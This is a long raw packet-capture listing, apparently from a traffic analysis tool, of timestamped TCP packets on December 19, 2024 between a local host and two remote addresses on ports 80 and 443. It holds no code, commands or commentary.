                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.721220970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.721936941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.722021103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.722106934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.722141981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.722270012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.722836018 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.722872019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.722907066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.722918034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.722918034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.722959042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.723728895 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.723763943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.723798037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.723802090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.723834038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.723834038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.724600077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.724634886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.724689007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.727735043 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.727765083 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.727812052 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.727929115 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.727929115 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.727930069 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.728005886 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.728079081 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.746923923 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.746992111 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.747100115 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.747100115 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.747134924 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.747185946 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.763607979 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.763655901 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.763706923 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.763706923 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.763724089 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.763773918 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.779649019 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.779691935 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.779817104 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.779817104 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.779850006 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.779903889 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.799493074 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.799542904 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.799663067 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.799663067 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.799695015 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.799742937 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.900959015 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.901021004 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.901045084 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.901112080 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.901149988 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.901200056 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.914602995 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.914652109 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.914668083 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.914684057 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.914722919 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.914722919 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.929050922 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.929099083 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.929121017 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.929135084 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.929183960 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.929184914 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.940862894 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.940910101 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.940944910 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.940958023 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.940989017 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.941016912 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.952944994 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.952991009 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.953022003 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.953035116 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.953062057 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.953082085 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.964471102 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.964524984 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.964554071 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.964566946 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.964596987 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.964628935 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.976834059 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.976881981 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.976907969 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.976919889 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.976970911 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.976970911 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.985934019 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.985997915 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.986006975 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.986030102 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.986057043 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:56.986077070 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.096335888 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.096385002 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.096446037 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.096467018 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.096518040 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.096518040 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.105767965 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.105818033 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.105873108 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.105885983 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.105917931 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.105941057 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.115559101 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.115614891 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.115667105 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.115679026 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.115710020 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.115727901 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.121980906 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.122025967 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.122080088 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.122092962 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.122123003 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.122144938 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.130424023 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.130474091 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.130516052 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.130527973 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.130558014 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.130579948 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.138413906 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.138465881 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.138504028 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.138515949 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.138545036 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.138566971 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.155426979 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.155472040 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.155540943 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.155551910 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.155582905 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.155601025 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.156029940 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.156075001 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.156105042 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.156116962 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.156162977 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.156181097 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.287575006 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.287620068 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.287693024 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.287712097 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.287739992 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.287765980 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.296315908 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.296370983 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.296415091 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.296427965 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.296454906 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.296473026 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.302654028 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.302697897 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.302740097 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.302752018 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.302783012 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.302803993 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.310623884 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.310667038 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.310703039 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.310715914 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.310748100 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.310769081 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.318037987 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.318084955 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.318121910 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.318139076 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.318170071 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.318188906 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.325278997 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.325325966 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.325354099 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.325366020 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.325392962 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.325409889 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.336133957 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.336218119 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.336533070 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.336606979 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.341950893 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.341975927 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.342016935 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.342031002 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.342067003 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.348031998 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.479496956 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.479516029 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.479578972 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.479609013 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.479635954 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.479677916 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.486928940 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.486943007 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.487003088 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.487020016 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.487070084 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.494602919 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.494620085 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.494671106 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.494683027 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.494729996 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.494966984 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.501213074 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.501229048 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.501290083 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.501305103 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.501357079 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.508841038 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.508855104 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.508935928 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.508949041 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.509002924 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.515918016 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.515933037 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.516005993 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.516036034 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.516094923 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.526947975 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.526961088 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.527040005 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.527053118 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.527103901 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.534051895 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.534065008 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.534147024 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.534161091 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.534213066 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.671565056 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.671581984 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.671710968 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.671744108 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.671804905 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.679162979 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.679177999 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.679292917 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.679308891 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.679362059 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.686594963 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.686609983 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.686692953 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.686707020 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.686758995 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.693238020 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.693252087 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.693330050 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.693344116 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.693397999 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.700917006 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.700931072 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.701023102 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.701040983 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.701097965 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.707917929 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.707932949 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.707993031 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.708009005 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.708070993 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.719269991 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.719299078 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.719352007 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.719362974 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.719397068 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:57.719412088 CET49875443192.168.2.4185.199.111.133
